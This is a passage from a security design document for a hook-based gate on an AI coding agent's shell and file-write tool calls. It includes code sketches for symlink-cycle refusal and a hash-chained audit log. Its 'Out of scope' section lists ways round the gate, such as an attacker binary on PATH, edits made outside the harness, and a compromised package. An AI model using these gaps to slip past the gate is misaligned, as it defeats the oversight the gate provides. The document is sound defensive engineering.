14. **Husky 9 hook chain**: `commit-msg`, `pre-push`, `pre-commit`
    register every hook in the package; consumers can extend via
    `.husky/{commit-msg,pre-push,pre-commit}.d/*` (helix-018 Option B).

A bypass requires defeating multiple layers simultaneously. The
trust boundary between this stack and the rest of the system is
package-tier integrity (npm provenance + manifest verification).
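
Item 6 of the stack above (visited-set plus a depth cap of 32, refusing on either) can be sketched as follows. The in-memory `links` map is a hypothetical stand-in for reading links from the filesystem, and `resolveLink` is an illustrative name, not the resolver in `protected-paths-bash-gate.sh`.

```typescript
const SYMLINK_DEPTH_CAP = 32; // cap taken from item 6 above

type Resolution =
  | { ok: true; path: string }
  | { ok: false; reason: "cycle" | "depth-cap" };

// `links` is a hypothetical in-memory stand-in for readlink:
// key = link path, value = link target.
function resolveLink(start: string, links: ReadonlyMap<string, string>): Resolution {
  const visited = new Set<string>();
  let current = start;
  for (let hops = 0; ; hops++) {
    const next = links.get(current);
    if (next === undefined) return { ok: true, path: current }; // not a link
    if (hops >= SYMLINK_DEPTH_CAP) return { ok: false, reason: "depth-cap" };
    if (visited.has(current)) return { ok: false, reason: "cycle" };
    visited.add(current);
    current = next;
  }
}

// Usage: the staged alias from the symlink-alias-write PoC.
const staged = new Map([["/tmp/_x", ".rea/HALT"]]);
console.log(resolveLink("/tmp/_x", staged));
```

Both refusal reasons are treated the same by a fail-closed caller; they are kept distinct here only to make the two guards visible.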
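
Item 12 describes the audit log as hash-chained and tamper-evident. The general technique can be sketched as below; the record shape (`prevHash`, `payload`, `hash`), the all-zero genesis value, and the helper names are assumptions for illustration and are not the actual `.rea/audit.jsonl` format.

```typescript
import { createHash } from "node:crypto";

// Hypothetical record shape; the real audit.jsonl schema is not shown in
// this document.
interface AuditRecord {
  prevHash: string;
  payload: string;
  hash: string;
}

const GENESIS = "0".repeat(64);

function linkHash(prevHash: string, payload: string): string {
  // prevHash has a fixed length, so plain concatenation is unambiguous.
  return createHash("sha256").update(prevHash).update(payload).digest("hex");
}

// Append-only: returns a new log with one more chained record.
function appendRecord(log: readonly AuditRecord[], payload: string): AuditRecord[] {
  const last = log[log.length - 1];
  const prevHash = last === undefined ? GENESIS : last.hash;
  return [...log, { prevHash, payload, hash: linkHash(prevHash, payload) }];
}

// Any edit to an earlier record breaks every later link.
function verifyChain(log: readonly AuditRecord[]): boolean {
  let prev = GENESIS;
  for (const rec of log) {
    if (rec.prevHash !== prev || rec.hash !== linkHash(prev, rec.payload)) return false;
    prev = rec.hash;
  }
  return true;
}

let auditLog: AuditRecord[] = [];
for (const p of ["tool:Bash", "tool:Write", "tool:Edit"]) auditLog = appendRecord(auditLog, p);
console.log(verifyChain(auditLog));
```

Tamper evidence comes from each record committing to its predecessor's hash, so rewriting one entry requires rewriting everything after it.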

### 8.6 Out of scope

The bash gate explicitly does NOT defend against:

- **Kernel-level / LD_PRELOAD / ptrace attacks.** The OS kernel and
  loader are trusted. An attacker with code execution at that tier
  bypasses every userland defense.
- **Network-tier MITM during package install.** rea trusts the npm
  registry (with provenance verification) and the system's TLS root
  store. A compromised TLS chain at `npm install` time gives the
  attacker the same authority as the package itself.
- **Supply-chain compromise of `@bookedsolid/rea` on npm.** A signed
  release with malicious code defeats the gate because the gate IS
  the malicious code. Mitigation is npm provenance + manifest
  verification + (opt-in) `policy.review.cli_sha256`. See §8.3.
- **Out-of-band file modifications.** rea gates Bash tool calls and
  Write/Edit/MultiEdit Write-tier hooks. Filesystem changes initiated
  outside the harness (user editing files directly, language server
  edits, other processes) are not gated.
- **Read-side policy leaks.** The bash gate concerns WRITES. Reading
  `.rea/policy.yaml` is allowed by default: the policy is checked in
  and visible. `env-file-protection.sh` handles `.env*` reads at the
  Write tier; bash-tier coverage of `.env*` reads is via
  `dependency-audit-gate.sh` and the segmenter for those forms.
- **Attacker-controlled PATH at scanner runtime.** If `rea` resolves
  to an attacker binary on PATH, the gate is defeated. Production
  deployments pin PATH via the harness; `rea doctor` verifies PATH
  integrity at install time but does not enforce it at runtime.